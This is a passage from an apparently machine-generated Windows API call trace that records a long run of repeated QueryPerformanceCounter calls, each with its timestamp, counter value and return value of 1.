lpPerformanceCount=0x6adfdfc*=3096645748910) returned 1 [0147.639] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096645763036) returned 1 [0147.655] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096647362630) returned 1 [0147.655] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096647385651) returned 1 [0147.671] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096648962273) returned 1 [0147.671] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096648992381) returned 1 [0147.686] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096650546575) returned 1 [0147.687] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096650559473) returned 1 [0147.702] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096652148102) returned 1 [0147.703] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096652161603) returned 1 [0147.718] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096653729094) returned 1 [0147.718] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096653741264) returned 1 [0147.734] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096655295662) returned 1 [0147.734] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096655308329) returned 1 [0147.750] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096656900945) returned 1 [0147.750] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096656914430) returned 1 [0147.766] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096658511832) returned 1 [0147.766] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096658529288) returned 1 [0147.782] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096660121139) returned 1 [0147.782] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096660141802) returned 1 [0147.798] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096661705426) returned 1 [0147.798] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096661724258) returned 1 [0147.814] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096663328149) returned 1 [0147.814] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096663341863) returned 1 [0147.830] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096664896470) returned 1 [0147.830] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096664910775) returned 1 [0147.846] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096666499989) returned 1 [0147.846] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096666515234) returned 1 [0147.862] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096668072886) returned 1 [0147.862] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096668087936) returned 1 [0147.878] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096669676603) returned 1 [0147.878] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096669689770) returned 1 [0147.894] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096671289100) returned 1 [0147.894] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096671309046) returned 1 [0147.910] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096672882010) returned 1 [0147.910] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096672898919) returned 1 [0147.926] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096674470246) returned 1 [0147.926] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096674485943) returned 1 [0147.942] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096676067198) returned 1 [0147.942] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096676080106) returned 1 [0147.958] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096677670473) returned 1 [0147.958] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096677688176) returned 1 [0147.974] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096679269201) returned 1 [0147.974] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096679282601) returned 1 [0147.990] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096680865654) returned 1 [0147.990] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096680879435) returned 1 [0148.006] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096682474496) returned 1 [0148.006] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096682488699) returned 1 [0148.022] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096684066567) returned 1 [0148.022] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096684079519) returned 1 [0148.038] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096685667577) returned 1 [0148.038] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096685680430) returned 1 [0148.054] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096687267970) returned 1 [0148.054] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096687280930) returned 1 [0148.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096688870878) returned 1 [0148.070] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096688887436) returned 1 [0148.086] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096690470675) returned 1 [0148.086] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096690487587) returned 1 [0148.102] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096692572988) returned 1 [0148.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096692674494) returned 1 [0148.118] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096693662972) returned 1 [0148.118] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096693687750) returned 1 [0148.134] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096695259383) returned 1 [0148.134] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096695281572) returned 1 [0148.149] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096696854571) returned 1 [0148.150] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096696872415) returned 1 [0148.166] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096698455022) returned 1 [0148.166] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096698471793) returned 1 [0148.181] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096700052247) returned 1 [0148.182] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096700067766) returned 1 [0148.198] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096701656275) returned 1 [0148.198] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096701672462) returned 1 [0148.216] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096703512268) returned 1 [0148.216] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096703537183) returned 1 [0148.232] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096705102845) returned 1 [0148.232] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096705119119) returned 1 [0148.248] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096706701757) returned 1 [0148.248] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096706720012) returned 1 [0148.264] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096708301939) returned 1 [0148.264] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096708320805) returned 1 [0148.305] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096712365133) returned 1 [0148.305] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096712389215) returned 1 [0148.305] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096712423382) returned 1 [0148.305] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096712444899) returned 1 [0148.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096714096642) returned 1 [0148.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096714122027) returned 1 [0148.337] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096715628758) returned 1 [0148.337] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096715645217) returned 1 [0148.353] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096717227513) returned 1 [0148.353] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096717243888) returned 1 [0148.369] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096718827332) returned 1 [0148.369] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096718843321) returned 1 [0148.385] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096720458941) returned 1 [0148.386] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096720475599) returned 1 [0148.401] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096722034487) returned 1 [0148.401] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096722052270) returned 1 [0148.417] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096723621679) returned 1 [0148.417] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096723650227) returned 1 [0148.439] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096725760638) returned 1 [0148.439] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096725783431) returned 1 [0148.453] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096727190124) returned 1 [0148.453] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096727203939) returned 1 [0148.469] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096728793819) returned 1 [0148.469] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096728808052) returned 1 [0148.485] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096730388052) returned 1 [0148.485] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096730402469) returned 1 [0148.503] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096732201912) returned 1 [0148.503] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096732230675) returned 1 [0148.517] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096733590854) returned 1 [0148.517] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096733608565) returned 1 [0148.533] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096735192533) returned 1 [0148.533] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096735205957) returned 1 [0148.549] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096736790066) returned 1 [0148.549] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096736804952) returned 1 [0148.565] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096738390914) returned 1 [0148.565] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096738405179) returned 1 [0148.581] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096739962020) returned 1 [0148.581] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096739975195) returned 1 [0148.597] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096741637405) returned 1 [0148.598] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096741670357) returned 1 [0148.613] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096743232406) returned 1 [0148.615] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096743401746) returned 1 [0148.629] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096744772262) returned 1 [0148.629] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096744785714) returned 1 [0148.645] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096746378587) returned 1 [0148.645] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096746393011) returned 1 [0148.661] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096747976392) returned 1 [0148.661] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096747989992) returned 1 [0148.677] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096749581630) returned 1 [0148.677] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096749596027) returned 1 [0148.692] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096751145990) returned 1 [0148.693] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096751159294) returned 1 [0148.708] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096752740190) returned 1 [0148.708] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096752753726) returned 1 [0148.724] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096754342825) returned 1 [0148.725] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096754357176) returned 1 [0148.740] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096755942258) returned 1 [0148.741] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096755955832) returned 1 [0148.756] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096757545518) returned 1 [0148.757] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096757558761) returned 1 [0148.772] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096759154290) returned 1 [0148.773] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096759170444) returned 1 [0148.788] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096760749974) returned 1 [0148.789] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096760765823) returned 1 [0148.804] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096762349350) returned 1 [0148.805] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096762364203) returned 1 [0148.820] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096763952295) returned 1 [0148.821] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096763979952) returned 1 [0148.836] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096765515656) returned 1 [0148.836] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096765533550) returned 1 [0148.852] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096767116488) returned 1 [0148.852] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096767137034) returned 1 [0148.868] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096768720463) returned 1 [0148.868] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096768761663) returned 1 [0148.884] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096770317252) returned 1 [0148.884] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096770339801) returned 1 [0148.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096771918607) returned 1 [0148.900] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096771944976) returned 1 [0148.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096773517155) returned 1 [0148.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096773541516) returned 1 [0148.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096775110910) returned 1 [0148.932] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096775127084) returned 1 [0148.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096776707866) returned 1 [0148.948] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096776721358) returned 1 [0148.964] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096778320445) returned 1 [0148.964] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096778334332) returned 1 [0148.980] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096779916213) returned 1 [0148.980] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096779929562) returned 1 [0148.996] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096781510486) returned 1 [0148.996] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096781526528) returned 1 [0149.012] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096783108328) returned 1 [0149.012] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096783121909) returned 1 [0149.029] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096784839804) returned 1 [0149.030] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096784855259) returned 1 [0149.044] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096786320302) returned 1 [0149.044] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096786337330) returned 1 [0149.060] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096787915135) returned 1 [0149.060] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096787929116) returned 1 [0149.076] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096789517379) returned 1 [0149.076] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096789532873) returned 1 [0149.092] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096791117007) returned 1 [0149.092] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096791130382) returned 1 [0149.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096792715321) returned 1 [0149.108] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096792728764) returned 1 [0149.124] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096794317500) returned 1 [0149.124] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096794330968) returned 1 [0149.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096795914060) returned 1 [0149.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096795928888) returned 1 [0149.156] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096797517078) returned 1 [0149.156] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096797530518) returned 1 [0149.172] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096799113590) returned 1 [0149.172] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096799127894) returned 1 [0149.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096800716053) returned 1 [0149.188] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096800735218) returned 1 [0149.204] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096802312593) returned 1 [0149.204] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096802325759) returned 1 [0149.220] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096803911465) returned 1 [0149.220] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096803925092) returned 1 [0149.236] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096805513850) returned 1 [0149.236] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096805527135) returned 1 [0149.252] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096807111182) returned 1 [0149.252] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096807125089) returned 1 [0149.268] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096808712158) returned 1 [0149.268] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096808725438) returned 1 [0149.284] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096810315572) returned 1 [0149.284] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096810328914) returned 1 [0149.300] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096811922738) returned 1 [0149.300] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3096811940603) returned 1 [0149.320] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 